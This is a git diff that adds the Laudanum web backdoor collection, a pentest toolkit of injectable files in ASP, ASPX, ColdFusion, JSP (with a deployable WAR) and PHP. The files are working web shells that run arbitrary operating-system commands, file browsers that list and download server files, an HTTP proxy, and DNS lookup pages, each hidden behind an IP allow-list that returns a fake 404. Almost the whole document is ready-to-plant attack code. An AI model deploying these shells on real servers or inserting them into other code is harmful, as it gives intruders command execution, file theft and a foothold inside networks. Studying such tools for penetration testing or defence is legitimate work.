"application/octet-stream" + set stream = Server.CreateObject("ADODB.Stream") + stream.Open + stream.Type = 1 + Response.Charset = "UTF-8" + stream.LoadFromFile(file.Path) + ' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb. + Response.BinaryWrite(stream.Read) + stream.Close + set stream = Nothing + set file = Nothing + Response.End + end if +end if + +' begin rendering the page +%> + + + Laudanum ASP File Browser + + + +

Laudanum File Browser 0.1

+ +<% +' get the path to work with, if it isn't set or valid then start with the web root +' goofy if statement is used since vbscript doesn't use short-curcuit logic +path = trim(Request.QueryString("path")) +if len(path) = 0 then + path = fso.GetFolder(Server.MapPath("\")) +elseif not fso.FolderExists(path) then + path = fso.GetFolder(Server.MapPath("\")) +end if + +set folder = fso.GetFolder(path) + +' Special locations, webroot and drives +%>Other Locations: <% +for each i in fso.Drives + if i.IsReady then + %><%=i.DriveLetter%>:  <% + end if +next +%>">web root
<% + +' Information on folder +%>

Listing of: <% +list = split(folder.path, "\") +temppath = "" +for each i in list + temppath = temppath & i & "\" + %><%=i%>\ <% +next +%>

<% + +' build table for listing +%> +<% +' Parent Path if it exists +if not folder.IsRootFolder then + %><% +end if + +' Get the folders +set list = folder.SubFolders +for each i in list + %><% +next + +' Get the files +set list = folder.Files +for each i in list + %><% +next + +' all done +%> +
NameSizeModifiedAccessedCreated
..
<%=i.Name%>\
<%=i.Name%><%=FormatNumber(i.Size, 0)%><%=i.DateLastModified%><%=i.DateLastAccessed%><%=i.DateCreated%>
+
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/proxy.asp b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/proxy.asp new file mode 100644 index 0000000..d5db078 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/proxy.asp @@ -0,0 +1,454 @@ +<%@Language="VBScript"%> +<%Option Explicit%> +<%Response.Buffer = True%> +<% +' ******************************************************************************* +' *** +' *** Laudanum Project +' *** A Collection of Injectable Files used during a Penetration Test +' *** +' *** More information is available at: +' *** http://laudanum.secureideas.net +' *** laudanum@secureideas.net +' *** +' *** Project Leads: +' *** Kevin Johnson +' *** +' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** +' ******************************************************************************** +' *** +' *** This file provides access as a proxy. +' *** Written by Tim Medin +' *** +' ******************************************************************************** +' *** This program is free software; you can redistribute it and/or +' *** modify it under the terms of the GNU General Public License +' *** as published by the Free Software Foundation; either version 2 +' *** of the License, or (at your option) any later version. +' *** +' *** This program is distributed in the hope that it will be useful, +' *** but WITHOUT ANY WARRANTY; without even the implied warranty of +' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +' *** GNU General Public License for more details. +' *** +' *** You can get a copy of the GNU General Public License from this +' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +' *** You can also write to the Free Software Foundation, Inc., Temple +' *** Place - Suite Boston, MA USA. +' *** +' ***************************************************************************** */ + +' ***************** Config entries below *********************** + +' Define variables +Dim allowedIPs +Dim allowed +Dim i +Dim s 'generic string, yeah, I know bad, but at this point I just want it to work +Dim urltemp +Dim urlscheme +Dim urlhost +Dim urlport +Dim urlpath +Dim urlfile +Dim urlquery +Dim http +Dim method +Dim contenttype +Dim stream +Dim regex +Dim body +Dim params + +function err_handler() + %> + + + Laudanum ASP Proxy + + +

Fatal Error!

+ <%=Err.Number%>
+ <%=Err.Message%>
+
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ +<% +end function + +function CleanQueryString +' removes laudurl from the querystring +Dim i +Dim j +Dim s +Dim key +Dim q + + + if len(request.querystring) = 0 then + CleanQueryString = "" + exit function + end if + + ' build the request parameters + for i = 1 to request.querystring.count + key = request.querystring.key(i) + 'response.write "
key:" & key + if key = "laudurl" then + ' if the key is laudurl, we need check if there is a ? in the string since + ' it may have its own query string that doesn't get parsed properly. + s = split(request.querystring("laudurl"), "?") + if ubound(s) > lbound(s) then + ' laudurl contains a ?, it must be manually parsed + key = left(s(1), instr(s(1), "=") - 1) + q = q & "&" & key & "=" & mid(s(1), len(key) + 2) + end if + else + for j = 1 to request.querystring(key).count + 'response.write "
-value:" & request.querystring(key)(j) + q = q & "&" & key & "=" & request.querystring(key)(j) + next + end if + next + + if len(q) > 0 then + CleanQueryString = "?" & mid(q, 2) + else + CleanQueryString = "" + end if +end function + +function CleanFormValues() +Dim r + Set r = New RegExp + r.IgnoreCase = true + r.Global = true + + ' remove the laudurl paramater + r.Pattern = "laudurl=[^&]+($|&)" + CleanFormValues = r.Replace(request.form, "") + Set r = nothing +end function + +sub ParseUrl() +' parses the url into the global variables +Dim urltemp +Dim url + + 'get the url, it may be in the querystring for a get or from a form in a post + url = Request.QueryString("laudurl") + if url = "" then + url = Request.Form("laudurl") + end if + + if url = "" then + urlscheme = "" + urlhost = "" + urlport = "" + urlpath = "" + urlfile = "" + urlquery = "" + exit sub + end if + + ' Parse the url and break it into its components + ' this is done so it can be used to rewrite the page + + ' ensure the url has a scheme, if it doesn't then assume http + if instr(url,"://") = 0 then url = "http://" + url + + ' Get the scheme + urlscheme = split(url, "://")(0) & "://" + + ' urltemp is used to hold the remainder of the url as each portion is parsed + urltemp = mid(url, len(urlscheme) + 1) + 'get the host + if instr(urltemp, "/") = 0 then + ' there is no path so all that is left is the host + urlhost = urltemp + urlport = "" + urlpath = "/" + urlfile = "" + urlport = "" + else + ' there is more that just the hostname remaining + urlhost = left(urltemp, instr(urltemp, "/") - 1) + urltemp = mid(urltemp, len(urlhost) + 1) + + ' is there a port + if instr(urlhost, ":") = 0 then + ' no port + urlport = "" + else + ' there is a port + arr = split(urlhost, ":") + urlhost = arr(0) + urlport = ":" & arr(1) + end if + + ' all that is left is the path and the query + ' is there a query? + if instr(urltemp, "?") = 0 then + ' no query + urlpath = urltemp + 'urlquery = "" + else + 'Response.Write "

" & urltemp & "

" + urlpath = left(urltemp, instr(urltemp, "?") - 1) + 'urlquery = mid(urltemp, instr(urltemp, "?") + 1) + end if + + if right(urlpath, 1) = "/" then + urlfile = "" + else + ' we need to get the path and the file + urltemp = split(urlpath, "/") + urlfile = urltemp(ubound(urltemp)) + urlpath = left(urlpath, len(urlpath) - len(urlfile)) + end if + end if + + urlquery = CleanQueryString + + 'response.write "
scheme: " & urlscheme + 'response.write "
host: " & urlhost + 'response.write "
port: " & urlport + 'response.write "
path: " & urlpath + 'response.write "
file: " & urlfile + 'response.write "
query: " & urlquery + 'response.write "
full: " & FullUrl() + 'response.end +end sub + +function FullUrl() + FullUrl = urlscheme & urlhost & urlport & urlpath & urlfile & urlquery +end function + +sub RewriteHeaders() +Dim i +Dim header +Dim headervalue +Dim regexdomain +Dim regexpath + + ' setup a regular expression to clean the cookie's domain and path + Set regexdomain = New RegExp + regexdomain.IgnoreCase = true + regexdomain.Global = true + ' rewrite images and links - absolute reference + regexdomain.Pattern = "domain=[\S]+" + + Set regexpath = New RegExp + regexpath.IgnoreCase = true + regexpath.Global = true + ' rewrite images and links - absolute reference + regexpath.Pattern = "path=[\S]+" + + ' go through each header + for each i in Split(http.getAllResponseHeaders, vbLf) + ' Break on the \x0a and remove the \x0d if it exists + i = Replace(i, vbCr, "") + ' make sure it is a header and value + if instr(i, ":") > 0 then + ' break the response headers into header and value + header = trim(Left(i, instr(i, ":") - 1)) + header = replace(header, "_", "-") + headervalue = trim(Right(i, len(i) - instr(i, ":"))) + + ' don't add these two header types since they are handled automatically + if lcase(header) <> "content-type" and lcase(header) <> "content-length" and lcase(header) <> "transfer-encoding" then + if lcase(header) = "set-cookie" then + ' strip the domain from the cookie + headervalue = regexdomain.replace(headervalue, "") + ' strip the path from the cookie + headervalue = regexpath.replace(headervalue, "") + headervalue = trim(headervalue) + end if + response.AddHeader header, headervalue + end if + end if + next + + Set regexdomain = nothing + Set regexpath = nothing +end sub + +' TODO: Add authentication support so it will work behind a proxy +' IPs are enterable as individual addresses TODO: add CIDR support +allowedIPs = "192.168.0.1,127.0.0.1,::1" +' Just in cace you added a space in the line above +allowedIPs = replace(allowedIPS," ","") +'turn it into an array +allowedIPs = split(allowedIPS,",") ' +' make sure the ip is allowed +' TODO: change this to 0 for production, it is 1 for testing +allowed = 0 +for i = lbound(allowedIPs) to ubound(allowedIPs) + if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then + allowed = 1 + exit for + end if +next +' send a 404 if the IP Address is not allowed +if allowed = 0 then + Response.Status = "404 File Not Found" + Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) + Response.End +end if + + +'initialize variables +Set http = nothing +Set regex = nothing +Set stream = nothing + +' Define Constants +const useMSXML2 = 0 +const chunkSize = 1048576 ' 1MB + +' parse the url into its parts +ParseUrl() + +' check if there is a valid url +if len(FullUrl) = 0 then + ' no url to proxy, give `em the boring default page + + ' Default layout of the page + ' First thing you get when you hit the page without giving it a URL + %> + + + Laudanum ASP Proxy + + + + +

Laudanum ASP Proxy

+ +
"> + + +
+
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + <% + + Response.End() +end if + +' Let's get our Proxy on!!! +' define the request type +if useMSXML2 = 1 then + Set http = Server.CreateObject("MSXML2.XMLHTTP") +else + Set http = Server.CreateObject("Microsoft.XMLHTTP") +end if + +' get the request type +method = Request.ServerVariables("REQUEST_METHOD") + +' setup the request, false means don't send it yet +http.Open method, FullUrl, False + +' send the request +if method = "POST" then + params = CleanFormValues + http.setRequestHeader "Content-type", "application/x-www-form-urlencoded" + http.setRequestHeader "Content-length", len(params) + http.setRequestHeader "Connection", "close" + http.Send(params) +else + http.Send +end if + +' Replace the normal headers with the ones from the response +Response.Clear +contenttype = http.getResponseHeader("Content-Type") +Response.ContentType = contenttype + +' rewrite the headers. Takes headers and passes them to new request +RewriteHeaders() + +' how to respond? is it text or is it something else? +if lcase(left(contenttype, 4)) = "text" then + ' response is text, so we need to rewrite it, but that's later + + + ' do the rewriting + body = http.responseText + + Set regex = New RegExp + regex.IgnoreCase = true + regex.Global = true + + ' rewrite images and links - absolute reference + s = urlscheme & urlhost & urlport + regex.Pattern = "((src|href).?=.?['""])(\/[^'""]+['""])" + body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") + + ' rewrite images and links - full reference + regex.Pattern = "((src|href).?=.?['""])(http[^'""]+['""])" + body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=$3") + + ' rewrite images and links - absolute reference + s = urlscheme & urlhost & urlport & urlpath + regex.Pattern = "((src|href).?=.?['""])([^\/][^'""]+['""])" + body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") + + + ' rewrite forms - absolute reference + s = urlscheme & urlhost & urlport + regex.Pattern = "(\]+action.?=.?['""])(\/[^'""]+)(['""][^\>]*[\>])" + body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") + + ' rewrite forms - full reference + regex.Pattern = "(\]+action.?=.?['""])(http[^'""]+)(['""][^\>]*[\>])" + body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") + + ' rewrite forms - absolute reference + s = urlscheme & urlhost & urlport & urlpath + regex.Pattern = "(\]+action.?=.?['""])([^\/][^'""]+)(['""][^\>]*[\>])" + body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") + + Response.Write(body) + + Set regex = nothing +else + ' some sort of binary response, so stream it + Set stream = nothing + Set stream = Server.CreateObject("ADODB.Stream") + stream.Type = 1 'Binary + stream.Open + stream.Write http.responseBody + stream.Position = 0 + + For i = 0 to stream.Size \ chunkSize + Response.BinaryWrite(stream.Read(chunkSize)) + next + Set stream = nothing +end if + +Set http = nothing + +Response.End + +:HandleError +err_handler + +%> + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/shell.asp b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/shell.asp new file mode 100644 index 0000000..0cdc7c6 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/shell.asp @@ -0,0 +1,83 @@ +<% +' ******************************************************************************* +' *** +' *** Laudanum Project +' *** A Collection of Injectable Files used during a Penetration Test +' *** +' *** More information is available at: +' *** http://laudanum.secureideas.net +' *** laudanum@secureideas.net +' *** +' *** Project Leads: +' *** Kevin Johnson +' *** +' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** +' ******************************************************************************** +' *** +' *** Updated and fixed by Robin Wood +' *** Updated and fixed by Tim Medin "1.2.3.4" then + response.Status="404 Page Not Found" + response.Write(response.Status) + response.End +end if + +if Request.Form("submit") <> "" then + Dim wshell, intReturn, strPResult + cmd = Request.Form("cmd") + Response.Write ("Running command: " & cmd & "
") + set wshell = CreateObject("WScript.Shell") + Set objCmd = wShell.Exec(cmd) + strPResult = objCmd.StdOut.Readall() + + response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
" + + set wshell = nothing +end if + +%> + +Laundanum ASP Shell + +
+Command:
+ +

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. +

Example command to do a directory listing:
+%ComSpec% /c dir +

+
+
+Copyright © 2012, Kevin Johnson and the Laudanum team.
+Written by Tim Medin.
+Get the latest version at laudanum.secureideas.net. +
+ + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/dns.aspx b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/dns.aspx new file mode 100644 index 0000000..f82ed13 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/dns.aspx @@ -0,0 +1,144 @@ +<%@ Page Language="C#"%> +<%@ Import Namespace="System" %> +Laudanum - DNS + +
+QUERY:
+Type: +
+STDOUT:
+
<% = stdout.Replace("<", "<") %>
+
+
+
+STDERR:
+
<% = stderr.Replace("<", "<") %>
+ + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/file.aspx b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/file.aspx new file mode 100644 index 0000000..f71fa43 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/file.aspx @@ -0,0 +1,154 @@ +<%@ Page Language="C#"%> +<%@ Import Namespace="System" %> +Laudanum - File + + + +<% string[] breadcrumbs = dir.Split('\\'); + string breadcrumb = ""; + foreach (string b in breadcrumbs) + { + if (b.Length > 0) + { + breadcrumb += b + "\\"; + Response.Write("" + Server.HtmlEncode(b) + ""); + Response.Write(" / "); + } + } + %> + + +<% + try + { + if (System.IO.Directory.Exists(dir)) + { + string[] folders = System.IO.Directory.GetDirectories(dir); + foreach (string folder in folders) + { + Response.Write(""); + } + } + else + { + Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir)); + Response.End(); + } + + } + catch (System.UnauthorizedAccessException ex) + { + Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir)); + Response.End(); + } + %> + +<% + System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir); + System.IO.FileInfo[] files = di.GetFiles(); + foreach (System.IO.FileInfo f in files) + { + Response.Write(""); + } + %> +
NameDateSize
" + Server.HtmlEncode(folder) + "
" + Server.HtmlEncode(f.Name) + "" + f.CreationTime.ToString() + "" + f.Length.ToString() + "
+ + \ No newline at end of file diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/shell.aspx b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/shell.aspx new file mode 100644 index 0000000..cae7665 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/shell.aspx @@ -0,0 +1,129 @@ +<%@ Page Language="C#"%> +<%@ Import Namespace="System" %> + + + +Laundanum ASPX Shell + + + +cmd /c +
+STDOUT:
+
<% = stdout.Replace("<", "<") %>
+
+
+
+STDERR:
+
<% = stderr.Replace("<", "<") %>
+ + +
+ +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + \ No newline at end of file diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/shell.cfm b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/shell.cfm new file mode 100644 index 0000000..be0466b --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/shell.cfm @@ -0,0 +1,80 @@ + + + + + + + + +Laudanum Coldfusion Shell + +
+ +Executable: For Windows use: cmd.exe or the full path to cmd.exe
+Arguments: For Windows use: /c command
+ +Executable:
+Arguments:
+ + +
+ + +
+
+#Replace(foo, "<", "<", "All")#
+
+ +Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware. + +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/cmd.war b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/cmd.war new file mode 100644 index 0000000000000000000000000000000000000000..5bbf5af6ac55a721ffee4c41dabb3ed161bc6e2d GIT binary patch literal 1203 zcmWIWW@Zs#-~hsRNdZ<2NPv@pg~8V~#8KDN&rSc|DFy~+h5&DN4v-2asImZ@nni#r z;F^6M{XE@VgG2Ou-9G!CIql=Et9OytTUYDcne&^246YbIcv__A<*VcAd$DvC3+IfN zl1HSaG%{GGKhyk?rY8PWJX~!0l4oMt70*;(XMQUBSi}f+$g;XvF?XOfAPjN{7uZpG zXubfsH{8_;>S!ID9|H(d++Y*oz|5SIg`KKnD{a8yt&fjlM7Rf9@&QG&hA;Y*tWj)f*8Zr zS5p^k7rqrOp<2LF+IQmS6Kyu5Zu4UrkHUVu&}+v?2O{GYk%Y^yAyk3CH~emt`!_I|>Tg;zAYpI(e!9i#fNKXubGv)UPK z-WRqBJyuOzc;nH(LzX*J{ zZyo%sRC?%mie2kV18LRf4jW!$rp@n4Bn1C$)l^l#@HYK%ikM*1nq!+wW;$;3>RtCC zcxr|$cSLnv$GZCISLMhS(s{69nOx^D~HOSLaYf9eZmj``W zoWxt%@B6Ks8t}-LP=cxiDRm1zq!+EjQOOeJ@zJ!$;!I z5uY4gRo*nV`x!r5IJczzmem%x(_B+yx}(NSTk4y9xBTUtgDmamIcH7cY+hD3Cms|d zmx2v+Vu7(y4$MCR-i%Bl45&E|maRZJ4;8?(5-1;{YemiopnQh_wm>FaD^e~5nZU(> zJHsGMI0j@QvJb+^pbUhZz(5%Y0p0+aFkR5>gzRWg8bl5YP#Q#lXTT7GrpN$qRyL3X ND-fyzg)5jrJOIrEdoKV0 literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/makewar.sh b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/makewar.sh new file mode 100644 index 0000000..3c89c12 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/makewar.sh @@ -0,0 +1,3 @@ +#!/bin/sh + +jar -cvf cmd.war warfiles/* diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF new file mode 100644 index 0000000..1df3391 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF @@ -0,0 +1,3 @@ +Manifest-Version: 1.0 +Created-By: 1.6.0_10 (Sun Microsystems Inc.) + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml new file mode 100644 index 0000000..688e583 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml @@ -0,0 +1,11 @@ + + + +Command +/cmd.jsp + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/cmd.jsp b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/cmd.jsp new file mode 100644 index 0000000..e33d3c0 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/cmd.jsp @@ -0,0 +1,41 @@ +<%@ page import="java.util.*,java.io.*"%> +<% + +if (request.getRemoteAddr() != "4.4.4.4") { + response.sendError(HttpServletResponse.SC_NOT_FOUND) + return; +} + +%> + +Laudanum JSP Shell + +Commands with JSP +
+ +
+If you use this against a Windows box you may need to prefix your command with cmd.exe /c +
+
+<%
+if (request.getParameter("cmd") != null) {
+out.println("Command: " + request.getParameter("cmd") + "
");
+Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+OutputStream os = p.getOutputStream();
+InputStream in = p.getInputStream();
+DataInputStream dis = new DataInputStream(in);
+String disr = dis.readLine();
+while ( disr != null ) {
+out.println(disr);
+disr = dis.readLine();
+}
+}
+%>
+
+
+
+Copyright © 2012, Kevin Johnson and the Laudanum team.
+Written by Tim Medin.
+Get the latest version at laudanum.secureideas.net. +
+ diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/dns.php b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/dns.php new file mode 100644 index 0000000..023927f --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/dns.php @@ -0,0 +1,161 @@ + +*** +*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides access to DNS on the system. +*** Written by Tim Medin +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +// ***************** Config entries below *********************** + +// IPs are enterable as individual addresses TODO: add CIDR support +$allowedIPs = array("19.168.2.16", "192.168.1.100"); + +# *********** No editable content below this line ************** + +$allowed = 0; +foreach ($allowedIPs as $IP) { + if ($_SERVER["REMOTE_ADDR"] == $IP) + $allowed = 1; +} + +if ($allowed == 0) { + header("HTTP/1.0 404 Not Found"); + die(); +} + + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP DNS Access + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + + +/* Initialize some variables we need again and again. */ +$query = isset($_POST['query']) ? $_POST['query'] : ''; +$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; +?> + + + + Laudanum PHP DNS Access + + + + + + +

DNS Query 0.1

+
+
+ DNS Lookup: +

Query: + Type: + +

+
+ + +"; + echo "Result = "; + print_r($result); + echo "Auth NS = "; + print_r($authns); + echo "Additional = "; + print_r($addtl); + echo ""; +} +?> +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/file.php b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/file.php new file mode 100644 index 0000000..97bf627 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/file.php @@ -0,0 +1,195 @@ + +*** +*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file allows browsing of the file system. +*** Written by Tim Medin +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +// ***************** Config entries below *********************** + +// IPs are enterable as individual addresses TODO: add CIDR support +$allowedIPs = array("192.168.1.1","127.0.0.1"); + +# *********** No editable content below this line ************** + +$allowed = 0; +foreach ($allowedIPs as $IP) { + if ($_SERVER["REMOTE_ADDR"] == $IP) + $allowed = 1; +} + +if ($allowed == 0) { + header("HTTP/1.0 404 Not Found"); + die(); +} + + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP File Browser + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
